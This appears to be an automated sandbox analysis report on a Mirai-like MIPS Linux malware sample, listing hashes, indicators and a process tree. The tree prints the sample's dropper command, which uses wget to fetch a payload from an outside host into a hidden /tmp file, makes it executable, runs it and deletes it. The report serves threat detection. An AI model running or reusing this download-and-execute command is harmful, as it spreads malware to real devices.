Analysis
  Max time kernel: 117s
  Max time network: 119s
  Platform: debian-9_mips
  Resource: debian9-mipsbe-20240226-en
  Resource tags: arch:mips, image:debian9-mipsbe-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  Submitted: 02/04/2024, 01:26
Behavioral task: behavioral1
  Sample: e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf
  Resource: debian9-mipsbe-20240226-en
General
  Target: e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf
  Size: 155KB
  MD5: 6153fdb5e5899070229f1c544ab3d291
  SHA1: cc61abc7d93b729f284efd418dfc815deaef2ba9
  SHA256: e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d
  SHA512: cf66e060c87cf967af1f134a20668b3f9aabf2b27f3551c33c529e93e9815dfdbd86eef2435a5c6251a30daea1ecae45f19cd11616729b5880ec65e174971141
  SSDEEP: 3072:B7esBFP23rWfOB7ZOOyGgWKmrThPaLEne7rNb:1euCloGgrmrThPaLEne7rNb
Malware Config
Signatures

Changes its process name (1 IoC)
  description                                                       ioc   pid  Process
  Changes the process name, possibly in an attempt to hide itself   sshd  696  e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf

Executes dropped EXE (1 IoC)
  ioc         pid  Process
  /tmp/.....  711  .....

Modifies Watchdog functionality (1 TTP, 2 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                    ioc
  File opened for modification   /dev/watchdog
  File opened for modification   /dev/misc/watchdog

Reads system routing table (1 TTP, 1 IoC)
  Gets active network interfaces from /proc virtual filesystem.
  description              ioc              Process
  File opened for reading  /proc/net/route  e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf

Reads system network configuration (1 TTP, 1 IoC)
  Uses contents of /proc filesystem to enumerate network settings.
  description              ioc              Process
  File opened for reading  /proc/net/route  e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf

Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  description                   ioc         Process
  File opened for modification  /tmp/.....  wget
Processes

/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf  (PID 696)
  Command line: /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf
  - Changes its process name
  - Reads system routing table
  - Reads system network configuration

    /bin/sh  (PID 697)
      Command line: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

        /usr/bin/wget  (PID 701)
          Command line: wget -q http://gay.energy/.../vivid -O .....
          - Writes file to tmp directory

        /bin/chmod  (PID 710)
          Command line: chmod 777 .....

        /tmp/.....  (PID 711)
          Command line: ./.....
          - Executes dropped EXE

        /bin/sh  (PID 711)
          Command line: /bin/sh ./.....

        /bin/rm  (PID 715)
          Command line: rm -rf .....